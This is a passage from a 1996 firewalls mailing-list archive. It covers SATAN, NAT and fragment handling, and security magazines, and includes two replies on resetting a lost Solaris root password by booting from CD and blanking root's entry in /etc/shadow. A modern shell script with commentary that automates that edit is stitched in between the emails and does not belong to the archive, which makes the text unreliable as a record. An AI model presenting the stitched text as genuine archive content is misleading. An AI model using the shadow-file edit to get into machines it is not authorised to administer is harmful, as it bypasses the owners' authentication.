Thus, while the tool aids a conscientious >security-aware administrator, it does increase the risk to the unwary >administrator. > >You can find this in the following web site: >http://www.fish.com/~zen/satan/satan-me.html > >Tools similar to SATAN have been available for years. One that comes to mind is the Raxco >Security Toolkit. Actually, this has been renamed as Axent ESM (Enterprise >Security Manager). I've used it in the past and it is quite good. From firewalls-owner Fri Jul 19 09:15:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00532 for firewalls-outgoing; Fri, 19 Jul 1996 08:39:34 -0700 (PDT) Received: from citel.upc.es (citel.upc.es [147.83.36.47]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA00513 for ; Fri, 19 Jul 1996 08:39:08 -0700 (PDT) Received: from jolibus (jolibus.upc.es [147.83.36.68]) by citel.upc.es (8.7.3/8.6.11) with SMTP id RAA23368 for ; Fri, 19 Jul 1996 17:35:51 +0100 (WET DST) Message-ID: <31EFAB56.2E7DA7DF@citel.upc.es> Date: Fri, 19 Jul 1996 17:35:50 +0200 From: Francesc Guasch Organization: UPC X-Mailer: Mozilla 2.02 (X11; I; Linux 2.0.0 i586) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: SATAN Information References: <9607191313.AA5530@smtpngw.acml.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry, which one was the trojan version of SATAN? 
I apologize for being off-topic; I didn't start the thread 8) -- ^-^_-----\ mailto:frankie@citel.upc.es o o ) http://www.etsetb.upc.es/~frankie Y (_ (___(ssss phone: (343) 401 6809 From firewalls-owner Fri Jul 19 09:34:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA03261 for firewalls-outgoing; Fri, 19 Jul 1996 09:24:49 -0700 (PDT) Received: from mulligan.com (grab.coslabs.com [199.233.92.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA03254 for ; Fri, 19 Jul 1996 09:24:42 -0700 (PDT) Received: from future.mulligan.com by mulligan.com (SMI-8.6/SMI-SVR4) Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) Message-Id: <199607191621.KAA17626@future.mulligan.com> To: "Wojno, Jim" cc: firewalls@greatcircle.com (Firewalls) Subject: Re: [HELP] I lost root password! Reply-to: geoff@usa.net In-reply-to: Your message of "Thu, 18 Jul 1996 09:53:00 EDT." X-Mailer: Mew version 1.05 on Emacs 19.31.1 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 19 Jul 1996 10:21:09 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk While you're right that editing /etc/passwd won't allow you to change the root password on Solaris 2.x, you CAN just edit /etc/shadow, and you don't have to worry about pwconv or restoring older versions of /etc/passwd and /etc/shadow. Here is the cookbook method to remove the root password:
1. Insert your Solaris 2.x installation CD.
2a. If you have a keyboard and monitor on the system: Type L1 A (hold down the L1/STOP key and press a) or POWER OFF - WAIT - POWER ON your machine.
2b. If you don't: Send a BREAK over your console port or POWER OFF - WAIT - POWER ON your machine.
3. At the boot prompt type: boot cdrom -s
4. After the system comes up, at the # command prompt type: mount /dev/dsk/c0t3d0s0 /mnt (you may have to change the device if your root partition is on a different drive)
4a. It's possible that you might have to fsck the partition before you can mount it: fsck /dev/rdsk/c0t3d0s0
5. Once the drive is mounted type:
    ed /mnt/etc/shadow
    /^root:/c
    root:::::::
    .
    w
    q
6. After you have edited the shadow password file reboot the machine: uadmin 2 1
7. After the system reboots log in as root
8. AND RESET YOUR ROOT PASSWORD
geoff From firewalls-owner Fri Jul 19 10:22:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA06969 for firewalls-outgoing; Fri, 19 Jul 1996 10:07:29 -0700 (PDT) Received: from sabre.net (sabre.net [199.100.49.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA06952 for ; Fri, 19 Jul 1996 10:07:22 -0700 (PDT) Received: (from uucp@localhost) by sabre.net (8.6.11/8.6.11) id MAA29559 for ; Fri, 19 Jul 1996 12:04:22 -0500 Received: from ns1.amrcorp.com(144.9.33.153) by sabre.net via smap (V1.3) Received: from amrcorp.com (ngw.amrcorp.com [144.9.33.151]) by amrcorp.com (8.7.1/8.7.1) with SMTP id MAA10719 for ; Fri, 19 Jul 1996 12:03:11 -0500 (CDT) Received: from USGW2-Message_Server by amrcorp.com Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 18 Jul 1996 12:57:56 -0600 From: Jasjit K Singh To: Firewalls@GreatCircle.COM, pera@medcom.se Subject: RE: [HELP] I lost root password! -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Stop-A
boot cdrom -sw (This will put you in single-user writable mode without asking for a password)
Mount the / disk (/dev/dsk/c0t3d0s0 - default) on /mnt
vi the /etc/shadow file and remove the password field.
Run passwd and change the password for root.
Halt the machine again and this time boot from the disk.
Good Luck!!
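The shadow-file edit that both recipes above turn on, written out as an added shell example that is not code from either post: it blanks root's password field in a shadow file that lives under an alternate mount point, using awk instead of ed or vi, keeps a backup copy, and checks what came out. The sample shadow file, its placeholder hash strings and the function names are constructed for the example; on a real box you would point it at /mnt/etc/shadow after the boot cdrom -s, fsck and mount steps above. The security point worth keeping in mind is the one the thread makes implicitly: anyone with console access and install media can do this, so console access is root access.

```shell
#!/bin/sh
# Added example, not code from either post above: the "blank root's password
# field in the shadow file" step, done with awk on a shadow file under an
# alternate mount point, plus a check of the result. Runs here against a
# constructed sample file; on a real Solaris box the target would be
# /mnt/etc/shadow after "boot cdrom -s" and mounting the root slice on /mnt.

# Print the password field (field 2) of one account from a shadow file.
# Exit status 1 if the account is not listed.
shadow_field() {
    # $1 = shadow file, $2 = account name
    awk -F: -v u="$2" '$1 == u { print $2; found = 1 } END { if (!found) exit 1 }' "$1"
}

# Blank the password field of one account, leaving every other field and
# every other line exactly as it was. A copy of the original is kept as
# "<file>.orig" so the change can be undone from the same single-user shell.
# The new file is written beside the old one and renamed into place, so a
# read-only mode on the original never blocks the write.
clear_password() {
    # $1 = shadow file, $2 = account name (root, in the recovery recipe)
    cp -p "$1" "$1.orig" || return 1
    awk -F: -v OFS=: -v u="$2" '$1 == u { $2 = "" } { print }' "$1" > "$1.new" || return 1
    chmod 400 "$1.new" && mv -f "$1.new" "$1"
}

# Count the lines in the edited file that do not appear in the backup,
# i.e. how many accounts the edit actually touched (should be exactly 1).
lines_changed() {
    # $1 = shadow file; compared against "$1.orig"
    grep -vxF -f "$1.orig" "$1" | wc -l | tr -d ' '
}

# Constructed sample shadow file: hypothetical accounts, and the hash
# columns are placeholder strings rather than real crypt(3) output.
make_sample_shadow() {
    # $1 = path to create
    cat > "$1" <<'EOF'
root:XXlockedhashXX:9700::::::
daemon:NP:6445::::::
bin:NP:6445::::::
jim:YYanotherhashYY:9700::::::
EOF
}

# Demo: build the sample, clear root, and show that only root changed.
demo() {
    d=$(mktemp -d) || return 1
    make_sample_shadow "$d/shadow"
    clear_password "$d/shadow" root
    printf 'root field after edit: "%s"\n' "$(shadow_field "$d/shadow" root)"
    printf 'jim field after edit:  "%s"\n' "$(shadow_field "$d/shadow" jim)"
    printf 'lines changed: %s\n' "$(lines_changed "$d/shadow")"
    rm -rf "$d"
}

demo
```

The check matters more than the edit: the thread's ed and vi recipes give no feedback, and a slip that blanks the wrong account or mangles the field count is only discovered at the next boot, from the same console you were trying to get back into.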
From firewalls-owner Fri Jul 19 11:00:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09466 for firewalls-outgoing; Fri, 19 Jul 1996 10:43:18 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA09445 for ; Fri, 19 Jul 1996 10:43:11 -0700 (PDT) Message-Id: <199607191743.KAA09445@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: IP Masquerading and vulnerabilities] To: shaver@neon.ingenia.ca (Mike Shaver) Date: Sat, 20 Jul 1996 03:39:26 +1000 (EST) Cc: peter@baileynm.com, cosmo@ebs.net, firewalls@GreatCircle.COM In-Reply-To: <199607140617.CAA20357@neon.ingenia.com> from "Mike Shaver" at Jul 14, 96 02:17:52 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Mike Shaver, sie said: > > Thus spake Peter da Silva: > > > > > Linux 2.0 has an option to re-assemble all fragmented > > > packets going thru it before applying the filter which stops it. > > > > Or just block packets that are too short to hold all the options. If you try > > and reassemble all the fragments that opens you up to a denial of service > > attack, and there really isn't any legitimate need to have packets that > > short. > > The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the > transparent proxy and NAT code more correct; otherwise, you can get > things like PORT commands (which matter to the NAT stuff, obviously) > split between 2 fragments. Just quickly, I sometimes wonder about the wisdom of those adding these featurisms to Linux. At least I think I remember being taught in networking classes how it is bad for a routing box to try to reassemble entire packets rather than just endpoints. [I wonder if proxies/relays fit into this category too...] The problem being dealt with is where NAT meets proxy (effectively). 
Unless the NAT uses a proxy of sorts to deal with translating addresses inside any layer above transport, it is not going to be a bug-free NAT. Well, this depends on how you define NAT... > My recommendation is that the transparent proxy stuff is better than > the NAT stuff (Darren? =) ), but it's not quite as plug-and-play. I would NOT use NAT if I wanted to make sure FTP/Real Audio, etc, worked... Darren From firewalls-owner Fri Jul 19 11:03:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10128 for firewalls-outgoing; Fri, 19 Jul 1996 10:53:19 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA10121 for ; Fri, 19 Jul 1996 10:53:14 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA00579 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Fri, 19 Jul 96 10:48:04 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607191748.AA02341@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, worrall@icn-inc.net Subject: Re: Network Security Magazines? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've found InfoSecurity to be interesting. It's written somewhat more to security than network technology, but overall it's not bad for a free magazine - read lots of ads and you have to fill out one of those surveys to get a subscription. I got my subscription through our plant security dept., but you can try emai